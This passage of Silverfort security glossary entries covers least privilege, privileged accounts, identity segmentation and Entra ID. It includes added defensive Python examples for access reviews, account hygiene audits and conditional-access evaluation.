POLP works in tandem with the zero trust model, which assumes that any user, device, or network could be compromised. By limiting access and privileges, zero trust architectures can help contain breaches when they occur. The principle of least privilege is considered a best practice for cybersecurity and is required for compliance with regulations like HIPAA, PCI DSS, and GDPR. Proper implementation of POLP can help reduce risk, limit the impact of data breaches, and support a strong security posture.

### Common Challenges of Enforcing Least Privilege

Enforcing the principle of least privilege can present several challenges for organizations.

One common challenge is determining appropriate access levels for different roles. It requires carefully analyzing what access is truly needed for employees to perform their jobs. If access is too restrictive, it can hamper productivity. If too permissive, it increases risk. Striking the right balance requires understanding both technical and business needs.

Another challenge is implementing least privilege in legacy systems and applications. Some older technologies were not designed with granular access control in mind and may require upgrades or replacements to properly support it. This can be resource-intensive, requiring investments of time, money, and staff. However, the risks of not modernizing outdated infrastructure that cannot adequately enforce least privilege likely outweigh these costs.

User provisioning and de-provisioning also present hurdles. When employees join, are promoted, or leave an organization, their access rights must be properly assigned, modified, or revoked. Without automated provisioning processes, this is prone to human error. Accounts may be misconfigured or not disabled promptly when no longer needed. Automation and strong provisioning policies are key to overcoming this challenge.

Finally, compliance with least privilege requires ongoing monitoring and review. Static access assignments will become outdated as technology, infrastructure, and business needs change. Regular audits are necessary to identify and remediate excessive or unnecessary access. This demands resources to perform reviews, manage exceptions, and make required changes to support continuous enforcement of least privilege. With time and practice, organizations can develop streamlined processes to ease these compliance challenges.

In summary, while least privilege is an essential best practice, implementing and sustaining it requires substantial and ongoing effort. However, the risks of failing to do so necessitate that organizations invest the resources to overcome these common challenges. With the proper technology, policies, and procedures in place, the principle of least privilege can be effectively enforced to maximize security.

### Implementing Least Privilege Access Controls

Implementing the principle of least privilege requires determining the minimum level of access users need to do their jobs and limiting access to that level. This is done through account management, access control policies, and identity and access management solutions. Privileges are assigned based on users' roles and responsibilities, with administrative access granted only when necessary. Regular reviews of account privileges and access logs also help ensure compliance with the principle of least privilege.

To implement least privilege access controls, organizations should:

- Conduct a data access review to identify who has access to what data and resources. This review will uncover unnecessary or excessive access privileges that should be revoked.
- Establish role-based access control (RBAC) policies that assign access privileges based on job roles and responsibilities. RBAC ensures that users only have access to the data and resources they need for their specific job function.
- Use the concept of "need to know" to grant access only when there is a legitimate need. Need to know limits access to sensitive data and resources to only authorized individuals.
- Implement access control mechanisms like multifactor authentication, identity and access management (IAM) tools, and privileged access management (PAM) solutions. These mechanisms and tools provide greater control and visibility over who has access to what.
- Continuously monitor access and make changes as needed. Regular access reviews and audits should be conducted to ensure policies and controls align with the principle of least privilege. Excessive access should be revoked immediately.
- Provide access on a temporary basis when possible. Temporary access privileges should be granted only for as long as needed to complete an authorized activity or task. Permanent access should be avoided when temporary access can meet the need.

### Conclusion

As organizations work to strengthen their cyber defenses, implementing the principle of least privilege should be a top priority. By restricting user access to only the resources and data required to perform a job, risks are reduced significantly. While it requires time and effort to configure systems and accounts properly, the long-term benefits to security posture and risk management are well worth it. Adopting a "zero trust" approach and verifying each request as though coming from an untrusted network is the direction many experts recommend. The principle of least privilege is a foundational best practice that all cybersecurity programs should embrace to build resilience and reduce vulnerabilities. Strictly enforcing access controls and continuously auditing them is the responsible and prudent thing to do.

---
- Published: 2023-11-30
- Modified: 2025-08-21
- URL: https://www.silverfort.com/glossary/privileged-account/

An account with elevated permissions (such as administrator or root access) that allows extensive control over systems and data—making it a high-value target for attackers.
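The RBAC, access-review, separation-of-duties and temporary-access steps from the two lists above, carried through as one added, runnable example. It is illustration code written for this page, not a Silverfort or any IAM product's API; the roles, their permissions, the users, their direct grants and the review timestamp are constructed, and the conflict pair in `SOD_CONFLICTS` is an assumed example of a separation-of-duties rule.

```python
"""Least-privilege access review over a small RBAC model.  Added example, not
from the page; roles, permissions, users, grants and the review date are
constructed."""
from dataclasses import dataclass, field
from datetime import datetime, timedelta, timezone

# Role -> permissions that role legitimately needs (constructed).
ROLE_PERMISSIONS = {
    "hr-analyst": {"hr-db:read", "hr-fileshare:read"},
    "payroll-clerk": {"hr-db:read", "payroll:submit"},
    "payroll-approver": {"payroll:approve"},
    "sysadmin": {"server:admin"},
}

# Separation of duties: permission pairs no single user may hold together.
SOD_CONFLICTS = [("payroll:submit", "payroll:approve")]


@dataclass
class User:
    name: str
    roles: set
    # Permissions granted outside roles: permission -> expiry (None = permanent).
    direct_grants: dict = field(default_factory=dict)


def role_permissions(user):
    """Permissions the user is entitled to purely through assigned roles."""
    perms = set()
    for role in user.roles:
        perms |= ROLE_PERMISSIONS.get(role, set())
    return perms


def effective_permissions(user, now):
    """Role permissions plus direct grants that have not expired."""
    perms = role_permissions(user)
    for perm, expiry in user.direct_grants.items():
        if expiry is None or expiry > now:
            perms.add(perm)
    return perms


def review(user, now):
    """Return the findings an access review should raise for one user."""
    findings = []
    entitled = role_permissions(user)
    for perm, expiry in user.direct_grants.items():
        if expiry is not None and expiry <= now:
            findings.append(f"expired grant still present: {perm}")
        elif expiry is None and perm not in entitled:
            findings.append(f"permanent grant outside role: {perm}")
        # An unexpired, time-boxed grant outside the role is tolerated: that is
        # what "provide access on a temporary basis" means in practice.
    effective = effective_permissions(user, now)
    for a, b in SOD_CONFLICTS:
        if a in effective and b in effective:
            findings.append(f"separation-of-duties conflict: {a} + {b}")
    return findings


def review_all(users, now):
    """Access review over the whole user population: name -> findings."""
    return {u.name: review(u, now) for u in users}


NOW = datetime(2025, 1, 15, 9, 0, tzinfo=timezone.utc)   # constructed review time
LATER = NOW + timedelta(hours=3)                           # a second review, later

SAMPLE_USERS = [
    User("alice", {"hr-analyst"}),
    # bob was handed approval rights permanently: excess plus an SoD conflict
    User("bob", {"payroll-clerk"}, {"payroll:approve": None}),
    # carol's temporary admin grant expired yesterday but was never revoked
    User("carol", {"hr-analyst"}, {"server:admin": NOW - timedelta(days=1)}),
    # dave holds a two-hour time-boxed grant for a support task
    User("dave", {"sysadmin"}, {"hr-db:read": NOW + timedelta(hours=2)}),
]

if __name__ == "__main__":
    for name, findings in review_all(SAMPLE_USERS, NOW).items():
        print(name, findings or "ok")
```

Running the same review again at `LATER` turns dave's clean result into an "expired grant still present" finding, which is the privilege-creep case the text warns about: a grant that was appropriate when issued becomes excess purely through the passage of time, so reviews have to recur rather than run once.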
Privileged accounts are user accounts that have elevated access privileges to an organization's systems and data. They include accounts like administrators, root, and service accounts. These accounts are highly sought after by attackers because compromising them provides broad access to the data and systems of privileged users.

Administrative accounts, or admin accounts, are user accounts with full administrative privileges to make changes to a system. They can install software, change system configurations, create or delete user accounts, and access sensitive data. Root accounts, common in Linux and Unix systems, have unlimited privileges. Service accounts are tied to specific applications and services, allowing them to start, stop, configure, and update services.

Because of their powerful capabilities, privileged accounts are considered a major security risk and require strong safeguards. If misused or compromised, they can inflict major damage. Proper management of privileged accounts is a crucial part of an organization's cybersecurity strategy. By implementing controls and monitoring these powerful accounts, you can reduce the risk of them being compromised and used to compromise your network. Failing to properly manage privileged access is like leaving your doors unlocked—sooner or later, someone will get in. With dangerous cyber threats on the rise, privileged account security should be a top priority.

### Types of Privileged Accounts

There are several types of privileged accounts that provide elevated access to systems and data. Understanding the differences between these account types is crucial for managing privileges and mitigating risks.

- Domain Admins have full control over Active Directory and other directories and can access resources across an entire domain. These highly privileged accounts should be carefully monitored and secured.
- Local Admins have elevated privilege rights on a single system or device. While their privileges are limited to that system, compromised local admin accounts can still enable an attacker to access sensitive data or install malware. Local admin access should be restricted whenever possible through the principle of least privilege.
- Service Accounts are used by applications and services to access resources. These accounts typically have more privileges than a standard user and are often overlooked in privilege management programs. Service accounts should be audited regularly to ensure privileges are appropriate and accounts are properly secured.
- Root accounts, also known as superusers, have unlimited privileges in Unix and Linux systems. Root access enables a user to fully control the system and should be strictly controlled. Users should only access the root account when necessary to perform administrative tasks.
- Emergency Access Accounts, like firecall accounts, provide a last line of access in the event of an outage or disaster. These highly privileged accounts need to be secured and monitored closely due to the significant damage that could result from unauthorized use. Access should be granted only when an emergency situation arises.

Privileged accounts that are not properly managed pose a serious risk to organizations. Implementing least privilege and privilege separation, monitoring account activity, and requiring multi-factor authentication are crucial controls for securing privileged access. With vigilance and the right strategy, privileged accounts can be safely governed to support business operations.

### The Risks of Unmanaged Privileged Accounts

Privileged accounts provide administrative access to critical systems and data, so they pose substantial risks if not properly managed. Unmanaged privileged accounts can lead to data breaches, cyber-attacks, and loss of sensitive information. According to research, 80% of data breaches involve privileged account compromise.

Privileged accounts like system administrators have unrestricted access to networks, servers, and databases. If compromised, they give attackers free rein to steal data, install malware, and wreak havoc. Attackers often target privileged accounts through phishing emails with malicious attachments or links. Once an attacker gains access to a privileged account, they can move laterally within the network to find valuable data and cover their tracks. It can take organizations months or even years to detect a breach involving privileged account compromise.

Unmanaged privileged accounts also pose risks from within. Overly permissive access rights and a lack of control over privileged accounts enable malicious insiders to abuse their access for personal gain. Insider threats are difficult to detect since insiders have legitimate access to systems and their behavior may not seem suspicious.

To reduce risks from privileged accounts, organizations must implement privileged access management (PAM) controls and continuously monitor privileged account activity. PAM controls like multi-factor authentication (MFA), least privilege, and privileged session monitoring help organizations strengthen security, gain visibility, and facilitate compliance.

MFA adds an extra layer of security for privileged account logins. It requires not only a password but also a security token or biometric scan to log in. MFA protects against phishing attempts, brute force attacks, and unauthorized access.

The principle of least privilege limits privileged account access rights to only what is needed to perform job functions. It reduces the attack surface and limits the damage from compromised accounts or malicious insiders. Privileged roles and access are granted only for specific, limited purposes and time periods before expiring.

Privileged session monitoring records and audits privileged account activity to provide accountability and detect suspicious behavior. Monitoring can detect threats in real time and provide forensic evidence for investigations. Organizations should log and monitor all commands, keystrokes, and activity for privileged accounts.

To summarize, unmanaged privileged accounts pose major cybersecurity risks that can have devastating consequences. Implementing controls like MFA, least privilege, and monitoring is critical for managing privileged account risks. With strong PAM practices in place, organizations can gain visibility and control over their privileged accounts, reducing vulnerabilities and strengthening their security posture.

### Best Practices for Securing Privileged Accounts

Securing privileged accounts is crucial for any organization. These accounts, like administrator, root, and service accounts, have elevated access and permissions, so protecting them should be a top priority. Failure to properly manage privileged accounts can have devastating consequences.

#### Least Privilege Access

The principle of least privilege means only granting users the minimum level of access needed to perform their jobs. For privileged accounts, this means only assigning elevated rights when absolutely necessary, and for limited periods of time. When admin access is no longer needed, permissions should be promptly revoked. This limits opportunities for accounts to be compromised and abused.

#### Multi-Factor Authentication

Multi-factor authentication (MFA) adds an extra layer of security for privileged accounts. It requires not only a password, but also another method of authentication like a security key, a code sent to a mobile device, or a biometric scan. MFA helps prevent unauthorized access even if a password is stolen. It should be enabled for all privileged accounts whenever possible.

#### Separate Accounts

Personal and privileged accounts should be separate. The same account should never be used for both normal and elevated access needs. Separate accounts allow for more granular permission assignment and auditing. Personal Internet usage and activities should also be kept completely separate from privileged accounts used for administrative tasks.

#### Monitoring and Auditing

All privileged account activity should be closely monitored to detect misuse or compromise as quickly as possible. Enable logging for all privileged accounts and review logs regularly. Monitor for anomalies like logins from unknown devices or locations, access during unusual hours, changes to security settings, or other suspicious behaviors. Audits provide visibility into how privileged accounts are being accessed and used over time.

#### Change Default Passwords

Default passwords for privileged accounts provide easy access for attackers and should be changed immediately. Require strong, unique passwords for all privileged accounts that follow standard complexity guidelines. Passwords should be routinely rotated, at least every 90 days. Reusing the same password for multiple privileged accounts should never be allowed.

#### Restrict Remote Access

Remote access to privileged accounts should be avoided when possible and heavily restricted when necessary. Require MFA for any remote logins and monitor them closely. Disable remote access completely for highly sensitive privileged accounts. On-premises access with a physical workstation is ideal for the most privileged accounts.

By following security best practices for privileged accounts, organizations can significantly reduce risks from compromised credentials and insider threats. Proper management and protection of privileged access is well worth the investment.

### Solutions for Privileged Access Management

Privileged access management (PAM) solutions aim to control and monitor privileged accounts. These specialized accounts have elevated permissions that provide administrative access, allowing users to make changes that impact systems and data.
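Before the individual PAM capabilities, here is the best-practice list above (default passwords changed, rotation within 90 days, no password reuse across privileged accounts, MFA enabled, remote access disabled for the most sensitive accounts) turned into an added hygiene audit over an account inventory. This is example code written for this page, not Silverfort's or any PAM product's code; the account records, the `h:...` tokens standing in for password hashes, the set of "default" hashes and the choice of which account kinds count as highly sensitive are all constructed assumptions.

```python
"""Privileged account hygiene audit against the best practices listed above.
Added example, not Silverfort code; the account records, the stand-in
password hashes and the list of 'default' hashes are constructed."""
from dataclasses import dataclass
from datetime import date

ROTATION_MAX_DAYS = 90                                   # rotation limit named on the page
DEFAULT_PASSWORD_HASHES = {"h:changeme", "h:admin"}      # constructed placeholders
HIGHLY_SENSITIVE_KINDS = {"domain-admin", "emergency"}   # assumption for this example


@dataclass
class PrivilegedAccount:
    name: str
    kind: str            # domain-admin | local-admin | service | root | emergency
    password_hash: str   # constructed token standing in for a real, salted hash
    password_set: date   # when the current password was last set
    mfa_enabled: bool
    remote_access: bool  # whether the account may log in remotely at all


def audit(accounts, today):
    """Return {account name: [findings]} for one inventory snapshot."""
    # Group accounts by hash so reuse across accounts can be reported.  Real
    # salted hashes would not collide; a vault's reuse check does this job.
    by_hash = {}
    for acct in accounts:
        by_hash.setdefault(acct.password_hash, []).append(acct.name)

    findings = {}
    for acct in accounts:
        issues = []
        if acct.password_hash in DEFAULT_PASSWORD_HASHES:
            issues.append("default password still set")
        age = (today - acct.password_set).days
        if age > ROTATION_MAX_DAYS:
            issues.append(f"password {age} days old, exceeds {ROTATION_MAX_DAYS}-day limit")
        others = sorted(n for n in by_hash[acct.password_hash] if n != acct.name)
        if others:
            issues.append("password shared with: " + ", ".join(others))
        if not acct.mfa_enabled:
            issues.append("MFA not enabled")
        if acct.remote_access and acct.kind in HIGHLY_SENSITIVE_KINDS:
            issues.append("remote access enabled on highly sensitive account")
        findings[acct.name] = issues
    return findings


TODAY = date(2025, 1, 15)   # constructed audit date

# Constructed inventory: one clean account and four with typical findings.
SAMPLE_ACCOUNTS = [
    PrivilegedAccount("DA-alice", "domain-admin", "h:7f3a", date(2024, 12, 1), True, False),
    PrivilegedAccount("svc-sql", "service", "h:admin", date(2024, 1, 1), False, False),
    PrivilegedAccount("LA-ws01", "local-admin", "h:9c1e", date(2024, 11, 20), True, True),
    PrivilegedAccount("LA-ws02", "local-admin", "h:9c1e", date(2024, 11, 20), True, False),
    PrivilegedAccount("BREAKGLASS", "emergency", "h:e1f2", date(2024, 12, 20), True, True),
]

if __name__ == "__main__":
    for name, issues in audit(SAMPLE_ACCOUNTS, TODAY).items():
        print(name, issues or "ok")
```

The two local-admin accounts illustrate why reuse is checked across the inventory rather than per account: each one looks fine on its own, and only the cross-account comparison reveals that compromising one workstation's admin password also opens the other.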
### Access Control

PAM solutions implement access control policies that grant privileged access only when needed according to the principle of least privilege. This may involve restricting which users can access which privileged accounts and what those accounts can access. Solutions may use tools like password vaults, multi-factor authentication, and password rotation to secure privileged accounts when not in use.

### Session Monitoring

PAM solutions monitor privileged sessions in real time to gain visibility into administrator activity. This deters malicious behavior and helps identify policy violations or areas where education is needed. Monitoring may capture details like keystrokes, screenshots, and session recordings. Analysts can then review these session details to detect anomalies and ensure compliance with security best practices.

### Threat Detection

Some PAM solutions incorporate user behavior analytics and machine learning to detect threats targeting privileged accounts. By analyzing details from monitoring privileged sessions and access requests, the solutions can identify suspicious activity that may indicate account compromise or data exfiltration. They may detect threats like brute force attacks, privilege escalation, and lateral movement between systems.

### Workflow Automation

PAM solutions can automate components of privileged access management to improve efficiency and scalability. They may automate processes such as access request approvals, password changes, and account reviews. Automation reduces the burden on IT staff and helps ensure consistent enforcement of security policies.

### Reporting and Alerting

Effective PAM depends on understanding how privileged accounts are being used. PAM solutions provide reporting and alerting capabilities that offer visibility into privileged account activity. Reports may show details like who has accessed which accounts, policy violations, and threats detected.
Alerts notify administrators of any urgent issues that require immediate action, like account compromise or data theft.

In summary, privileged access management solutions help organizations gain control over their privileged accounts through access control, monitoring, threat detection, automation, and reporting. Implementing a PAM solution is a key step organizations can take to improve their cybersecurity posture and reduce risk.

## Conclusion

As cyber threats become increasingly sophisticated, ensuring proper access control and monitoring of privileged accounts is critical for any organization. Privileged accounts, like administrator, root, and service accounts, have extended access and permissions within IT systems and networks. If compromised, they can be used to gain broad access to sensitive data and resources. However, they are necessary for the routine management and maintenance of infrastructure and services.

This article provides an overview of privileged accounts, why they are targets for cybercriminals, best practices for securing them, and strategies for monitoring them to detect potential misuse or compromise. For cybersecurity professionals and IT managers, understanding privileged accounts and how to properly manage the risks associated with them is fundamental to building a robust security posture.

---

- Published: 2023-11-06
- Modified: 2025-08-21
- URL: https://www.silverfort.com/glossary/identity-segmentation/

A cybersecurity strategy that isolates users into groups based on roles, attributes, or behavior in order to enforce least‑privilege access and minimize lateral movement risks.

Identity segmentation is a cybersecurity model that isolates users based on their job functions and business requirements. By segmenting user access strategically, an organization can implement tighter controls and monitoring over sensitive data and system resources.
For cybersecurity professionals, understanding identity segmentation concepts and best practices is crucial to reducing risk and protecting an organization's digital assets. When implemented correctly, identity segmentation reduces the likelihood of data compromise due to compromised credentials or insider threats by restricting lateral movement across the network. It allows security teams to enforce the principle of least privilege and "need to know" access for users and services.

Identity segmentation requires carefully analyzing user behavior and their interactions with different systems and resources to determine appropriate groupings and access levels. While complex to implement, identity segmentation is one of the most effective strategies for limiting the attack surface and hardening defenses. For any organization, identity is the new perimeter - and segmentation is key to controlling access and increasing overall identity security.

The core components of identity segmentation include:

- Attribute analysis: Examining attributes like job role, location, and access permissions to group similar identities. For example, executives can be segmented from contractors.
- Behavioral analysis: Analyzing behavior patterns like login times, resource access, and network activity to group identities with comparable behaviors. Unusual behaviors within a segment may point to compromised accounts or insider threats.
- Risk assessment: Determining the level of risk for each identity segment based on attributes, behaviors, and security policies. Higher-risk segments require stronger controls and monitoring.
- Policy enforcement: Implementing customized access controls, authentication requirements, auditing, and other security policies for each segment based on their risk assessment. Policies are adjusted as risks change.
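Three of the four components above (attribute analysis, risk assessment and policy enforcement; behavioral analysis is outside this block), as an added example that is not part of the original entry or of any product. Segment names, attributes, risk tiers and controls are assumptions. The part worth studying is how an identity that matches several segments is handled: the merged policy takes the highest risk tier, the strictest session and MFA requirement, and lets explicit denies override grants, which is one way to close the "more permissive segment wins" gap the entry describes later under Conflicting Controls.

```python
"""Identity segmentation: grouping by attributes, risk tiers, per-segment controls.

Added example (not from the original page). Segment definitions, attribute
names, risk tiers and controls are assumptions chosen to illustrate the entry.
"""
from dataclasses import dataclass, field


@dataclass
class Segment:
    name: str
    match: dict                 # attribute -> required value (all must match)
    risk: int                   # 1 (low) .. 3 (high)
    require_mfa: bool
    session_minutes: int
    grants: set = field(default_factory=set)  # resources the segment may reach
    denies: set = field(default_factory=set)  # resources explicitly barred


# Constructed segments. A contractor who is also a DBA matches two of these,
# which is exactly the overlap case that needs a deterministic merge rule.
SEGMENTS = [
    Segment("employees", {"type": "employee"}, 1, False, 480, {"intranet", "mail"}),
    Segment("contractors", {"type": "contractor"}, 2, True, 120, {"ticketing"}, {"prod-db", "hr-data"}),
    Segment("remote", {"location": "remote"}, 2, True, 240, {"vpn"}),
    Segment("db-admins", {"role": "dba"}, 3, True, 60, {"prod-db"}),
]


def matching_segments(identity: dict) -> list:
    """Attribute analysis: every segment whose rule the identity satisfies."""
    return [s for s in SEGMENTS if all(identity.get(k) == v for k, v in s.match.items())]


def effective_policy(identity: dict) -> dict:
    """Risk assessment plus merge of controls across all matching segments.

    Most restrictive wins: highest risk tier, MFA if any segment needs it,
    shortest session, and explicit denies removed from the union of grants so
    no segment can widen access that another segment bars.
    """
    segs = matching_segments(identity)
    if not segs:
        # Unsegmented identities get nothing (default deny) and the top risk tier.
        return {"segments": [], "risk": 3, "require_mfa": True,
                "session_minutes": 0, "allowed_resources": set()}
    grants = set().union(*(s.grants for s in segs))
    denies = set().union(*(s.denies for s in segs))
    return {
        "segments": [s.name for s in segs],
        "risk": max(s.risk for s in segs),
        "require_mfa": any(s.require_mfa for s in segs),
        "session_minutes": min(s.session_minutes for s in segs),
        "allowed_resources": grants - denies,
    }


def can_access(identity: dict, resource: str, mfa_done: bool) -> bool:
    """Policy enforcement for one request against the identity's merged policy."""
    pol = effective_policy(identity)
    if pol["require_mfa"] and not mfa_done:
        return False
    return resource in pol["allowed_resources"]


if __name__ == "__main__":
    # Constructed identities.
    for who in ({"type": "employee", "location": "office", "role": "dev"},
                {"type": "employee", "location": "remote", "role": "dba"},
                {"type": "contractor", "location": "remote", "role": "dba"}):
        print(who, "->", effective_policy(who))
```

With these rules the remote employee DBA reaches `prod-db` only with MFA and a 60-minute session, while the contractor DBA never reaches it at all because the contractor segment's deny wins over the DBA segment's grant; reviewing the merged policy per identity, rather than each segment in isolation, is also the visibility the entry calls for.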
## The Benefits of Implementing Identity Segmentation

Identity segmentation, also known as identity-based segmentation, enhances security by controlling access to resources based on user attributes. It aligns permissions with business needs, reducing an organization's attack surface.

### Granular Control

Identity segmentation provides granular control over user access. Rather than assigning broad permissions based on a user's role, access is granted based on attributes like department, location, and job function. This minimizes excessive privileges and limits the damage from compromised accounts.

### Streamlined Compliance

By aligning access with business needs, identity segmentation simplifies compliance with regulations like GDPR, HIPAA, and PCI DSS. Audits are more efficient since permissions map directly to organizational policies.

### Support for Hybrid Environments

In today's multi-cloud and hybrid IT environments, identity segmentation is crucial. It provides a consistent way to manage access across on-premises and cloud-based resources. The same attributes and policies are applied regardless of where applications and workloads reside.

### Improved Reporting

Identity segmentation generates valuable data that can be used for reporting and analysis. By tracking the relationship between user attributes, access, and permissions over time, organizations gain insight into usage patterns and can make data-driven decisions regarding access policies.

## How Does Identity Segmentation Work?

Identity segmentation divides identities into groups based on risk factors like access privileges, applications used, and geographic location. This allows organizations to apply security controls tailored to the specific risks of each group.

To implement identity segmentation, organizations first analyze identities and group them based on factors like:

- Job function and access needs (e.g. software engineers vs. HR staff)
- Applications and systems accessed (e.g. those using sensitive databases vs. public websites)
- Geographic location (e.g. headquarters office vs. remote workers)
- Previous security issues (e.g. identities with a history of phishing susceptibility)

Once identities have been segmented, security controls are customized for each group. For example:

- Identities accessing sensitive data may require multi-factor authentication and data encryption
- Remote workers could face additional monitoring and device security checks
- Groups with higher risk are prioritized for security awareness training

A "least privilege" approach is used to grant each segment only the minimum access needed. Access is regularly reviewed and revoked when no longer needed.

Technologies like Identity and Access Management (IAM), Privileged Access Management (PAM) and Zero Trust Network Access (ZTNA) are often used to facilitate identity segmentation. They provide granular control over identity and access policies, allowing tailored rules to be applied for each segment.

When implemented effectively, identity segmentation helps reduce the risk of a breach by minimizing the potential damage. If one segment is compromised, the attack is contained to that group and cannot spread easily to others. This "blast radius" limiting effect makes identity segmentation an important tool for modern cyber defense.

## Risks and Challenges of Identity Segmentation

Identity segmentation, or separating user identities into logical groupings, introduces risks that organizations must address to ensure secure access management.

### Lack of Governance

Without proper governance, identity segmentation can lead to vulnerabilities. Policies and controls must define who can access which systems and data based on business needs and compliance requirements. If governance is lacking, identities may be improperly segmented or have excessive access, creating opportunities for data breaches or insider threats.

### Human Error

Manual processes for assigning users to identity segments are prone to human error.
Mistakes like assigning a user to the wrong segment or giving too much access can have serious consequences. Automating identity segmentation where possible and implementing review processes can help minimize risks from human error.

### Conflicting Controls

If controls for different identity segments conflict or overlap, users may end up with unintended access. For example, if a user belongs to two segments with different levels of access for the same system, the access level that provides greater permissions may take precedence. Organizations must evaluate how controls for different segments interact to ensure secure access.

### Lack of Visibility

Without a comprehensive view of how identities are segmented and managed, organizations cannot properly assess and address risks. They need visibility into which users belong to which segments, how access is controlled for each segment, how segments inherit access from one another, and more. Gaining this visibility is key to governance, auditing, and risk mitigation.

## Network Segmentation vs Identity Segmentation

Network segmentation involves dividing a network into different segments to enhance security and control. Traditional network segmentation relies on factors like IP addresses, VLANs, and physical separation to create these segments. While effective at limiting the impact of a breach within the network, network segmentation often falls short in addressing the dynamic and evolving nature of user identities.

On the other hand, identity segmentation shifts the focus to user identities. This approach aligns with modern security threats where users are the primary targets and threats often exploit compromised credentials. Identity segmentation involves creating access controls based on user attributes, roles, and behavior, so users can only access the resources necessary for their roles, irrespective of their network location.
The primary difference lies in their focus: network segmentation emphasizes securing pathways and infrastructure, while identity segmentation centers on safeguarding individual user identities. Network segmentation tends to rely on static policies based on network structure, whereas identity segmentation involves dynamic and context-aware access controls based on user attributes. Identity segmentation is particularly effective in countering identity-based threats, which have become increasingly prevalent in the cybersecurity landscape.

### How does identity segmentation improve security?

Identity segmentation improves security by enabling targeted protection of sensitive resources. Rather than a one-size-fits-all approach, controls can be tailored to the specific risks of each segment. For example, identities with access to customer data may have stricter controls than those used by front-office staff. Segmentation also simplifies compliance by mapping controls directly to data access requirements for each role.

## Conclusion

Identity segmentation is an important cybersecurity concept that allows organizations to isolate sensitive and privileged accounts. By applying the principle of least privilege and limiting access to only authorized individuals, companies can reduce their risk exposure and ensure compliance. Though implementing identity segmentation requires time and resources, the long-term benefits to data security and privacy are well worth the investment. With the increasing complexity of IT infrastructure and the constant threat of breaches, identity segmentation will continue to be a best practice that organizations adopt.

---

- Published: 2023-10-11
- Modified: 2025-08-21
- URL: https://www.silverfort.com/glossary/azure-ad/

Microsoft’s cloud-based identity and access management service offering single sign-on, multifactor authentication, and integration with on‑premises Active Directory for hybrid identity solutions.
Azure Active Directory (Azure AD, now called Entra ID) is Microsoft's cloud-based identity and access management service. It provides single sign-on and multifactor authentication to help organizations securely access cloud applications and on-premises apps. Entra ID allows organizations to manage users and groups. It can integrate with on-premises Active Directory to provide a hybrid identity solution.

## Main Features of Entra ID

Entra ID’s main features include:

- Single sign-on (SSO) - Allows users to sign in once with one account to access multiple resources. This reduces the number of passwords needed and improves security.
- Multi-factor authentication (MFA) - Provides an extra layer of security for signing in to resources. It requires not only a password but also a verification code sent to the user's phone or an app notification.
- Application management - Administrators can add, configure, and manage access to SaaS applications like Office 365, Dropbox, Salesforce, etc. Users can then access all their applications through the Entra ID access panel.
- Role-based access control (RBAC) - Provides fine-grained access management for Entra resources and applications based on a user's role. This ensures users have access only to what they need to perform their jobs.
- Monitoring and reporting - Entra ID provides logs, reports, and alerts to help monitor activity and gain insights into access and usage. This information can help detect potential security issues.
- Self-service password reset - Allows users to reset their own passwords without calling helpdesk support. This reduces costs and improves the user experience.
- User provisioning - Users can be manually created and managed in the Entra ID portal, allowing administrators to define attributes, roles, and access rights.
- And more - Other capabilities include mobile device management, B2B collaboration, access reviews, conditional access, etc.
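The conditional access capability in the feature list above, worked as an added example: a sign-in context (application, country, client type, sign-in risk, and which controls the user has already satisfied) is evaluated against a list of constructed policies whose conditions are the ones the entry names (user location, device state, risk level, application accessed) and whose outcome is either block or require a control such as MFA. This is illustration code, not Microsoft's implementation or policy schema; the policy dictionary layout, the named location and the policy names are assumptions. The combination rule it applies is that a block from any applicable policy takes precedence, and otherwise the grant controls of every applicable policy must all be satisfied; report-only policies are recorded without affecting the decision.

```python
"""Simplified Conditional Access evaluation.

Added example (not code from the original page or from Microsoft). The policy
layout, named location and policy names are assumptions. Combination rule:
any applicable blocking policy blocks the sign-in; otherwise the grant
controls of all applicable policies are required together.
"""

# Constructed named locations: name -> set of country codes.
NAMED_LOCATIONS = {"corp-countries": {"US", "DE"}}

# Constructed policies. A missing condition means "any".
POLICIES = [
    {"name": "block-legacy-auth", "state": "on",
     "conditions": {"client_app": ["legacy"]}, "grant": "block"},
    {"name": "mfa-for-all-users", "state": "on",
     "conditions": {}, "grant": "require", "controls": ["mfa"]},
    {"name": "compliant-device-for-finance-app", "state": "on",
     "conditions": {"apps": ["finance-app"]}, "grant": "require",
     "controls": ["compliant_device"]},
    {"name": "block-high-risk", "state": "on",
     "conditions": {"sign_in_risk": ["high"]}, "grant": "block"},
    # Report-only: logs what it would do so the admin can check its reach first.
    {"name": "block-outside-corp-countries", "state": "report_only",
     "conditions": {"not_in_location": ["corp-countries"]}, "grant": "block"},
]


def sign_in(app: str, country: str = "US", client_app: str = "modern",
            sign_in_risk: str = "none", **satisfied: bool) -> dict:
    """Build a constructed sign-in context; `satisfied` lists controls already met."""
    return {"app": app, "country": country, "client_app": client_app,
            "sign_in_risk": sign_in_risk, "satisfied": satisfied}


def applies(policy: dict, ctx: dict) -> bool:
    """True if every condition of the policy matches the sign-in context."""
    cond = policy["conditions"]
    if cond.get("client_app") and ctx["client_app"] not in cond["client_app"]:
        return False
    if cond.get("apps") and ctx["app"] not in cond["apps"]:
        return False
    if cond.get("sign_in_risk") and ctx["sign_in_risk"] not in cond["sign_in_risk"]:
        return False
    for loc in cond.get("not_in_location", []):
        if ctx["country"] in NAMED_LOCATIONS[loc]:
            return False
    return True


def evaluate(ctx: dict) -> dict:
    """Decide one sign-in: block, grant, or the controls still to satisfy."""
    required, blocked_by, report_only = set(), [], []
    for p in POLICIES:
        if p["state"] == "off" or not applies(p, ctx):
            continue
        if p["state"] == "report_only":
            report_only.append(p["name"])
            continue
        if p["grant"] == "block":
            blocked_by.append(p["name"])
        else:
            required.update(p["controls"])
    if blocked_by:
        return {"result": "block", "blocked_by": blocked_by, "report_only": report_only}
    unmet = sorted(c for c in required if not ctx["satisfied"].get(c, False))
    return {"result": "grant" if not unmet else "needs_controls",
            "required": sorted(required), "unmet": unmet, "report_only": report_only}


if __name__ == "__main__":
    print(evaluate(sign_in("finance-app", mfa=True)))
    print(evaluate(sign_in("mail", client_app="legacy", mfa=True)))
```

Two details matter operationally: a blocking policy is evaluated even when the user has already passed MFA (the legacy-client case), and the report-only policy for sign-ins outside the corporate countries shows up in the result without changing it, which is how you measure a new policy's impact before switching it on.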
## How Entra ID Works

Entra ID works by syncing with on-premises directories and allowing single sign-on to cloud applications. Users can sign in once with one account and gain access to all their resources. Entra ID also enables multi-factor authentication, access management, monitoring, and security reporting to help protect user accounts and control access.

### How Directory Synchronization Works

